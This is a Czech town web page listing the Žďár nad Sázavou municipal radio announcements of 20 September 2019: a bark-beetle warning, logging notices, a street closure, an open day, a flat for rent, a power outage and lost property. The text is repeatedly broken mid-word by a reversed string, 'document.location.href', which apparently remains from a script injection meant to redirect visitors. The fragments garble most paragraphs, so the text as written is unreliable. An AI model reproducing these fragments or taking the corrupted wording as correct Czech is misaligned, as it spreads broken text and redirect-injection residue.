Rainbow page separator

Hlášení městského rozhlasu vysílaného dne 20. září 2019

Pátek, 20. září 2019

Žďár nad Sázavou / Přinášíme Vám aktuální informace z hlášení městského rozhlasu vysílaného dne 20. září 2019.

Z ÚŘADU:

Městský úřad Žďár nad Sázavou, odbor životního prostředí v souvislosti s kůrovcovou kalami[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tou upozorňuje vlastníky lesů na nárůst stavu kůrovců v lesích a žádá je, aby opě[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tovně prověřili v součinnosti s odborným lesním hospodářem stav lesů a odstranili, popřípadě asanovali napadené stromy. Napadené dřevo je třeba urychleně mechanicky či chemicky ošetřit a [„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to před výletem dospělců z napadeného dříví. Bližší informace najdete na webových stránkách města.

Upozornění pro občany od městského správce lesů.

Do konce měsíce září probíhá v městských lesích těžba dřeva velkým těžebním strojem harves[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tor. Žádáme občany, kteří navštěvují městské lesy, aby se okolí prováděné těžby důsledně vyhýbali. Jedná se o lesy Vetla, Radonínský les a les za Žďasem. Děkujeme za pochopení.

Vzhledem k výpadku ve výrobě materiálu na opravu šachty v ulici Husova je společnost SATT nucena posunout opravu horkovodu a celou uzavírku ulice na období od 2. září do 30. září 2019. Do té[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to doby budou dodávky tepelné energie v dané lokalitě bez omezení. Při opravě budou postiženi odběratelé v ulicích Veselská (pouze část před MŠ Sluníčko), Husova, Hálkova, Binkova, Drdlova, Sadová, Nádražní (od pošty směrem k nám. Republiky), Tyršova (od pošty k divadlu).

Městský úřad Žďár nad Sázavou Vás zve na Den otevřených dveří, který se koná dnes 20. září 2019 od 13:00 do 19:00 hodin ten[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tokrát na téma My a Unesco. Přijďte se podívat, zasoutěžit si, zaspor[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tovat a prožít zajímavé odpoledne.

VYHLÁŠENÉ ZÁMĚRY MĚSTA:

Měs[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to Žďár nad Sázavou vyhlašuje záměr na pronájem bytu č. 26, v budově č. p. 1932, č. o. 43 na ulici Brodská, Žďár nad Sázavou 3. Základní nájemné činí 1 432,- Kč/měsíc.

Na [„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tom[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to bytě není v době vyhlášení záměru přihlášena k trvalému pobytu žádná osoba. Přihlášky je možné podávat do 26. září 2019 do 12:00 hodin. Bližší informace naleznete na úřední desce města.

VÝLUKY:

E.ON Distribuce a.s. oznamuje, že bude přerušena dodávka elektrické energie v sobotu 21. září 2019 od 7:30 do 13:30 hodin pro oblast Radonín (mimo oblasti mezi Radonínským rybníkem a Žďasem) Bližší informace naleznete na úřední desce města.

ZTRÁTY A NÁLEZY:

Odbor finanční oznamuje, že na ztráty a nálezy byly v průběhu [„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];toho[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to týdne předány následující nálezy: finanční ho[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tovost a platební karta. Úplný seznam nalezených věcí je zveřejněn na úřední desce i na facebooku města. Bližší informace Vám poskytne Alena Benešová na tel. čísle 566 688 146 nebo osobně v kanceláři finančního odboru v 1. patře městského úřadu, dveře č. 35.

KULTURNÍ POZVÁNKY:

Kino Vysočina Vás zve v sobotu 21. září 2019 v 16:30 hodin na film „Nabarvené ptáče“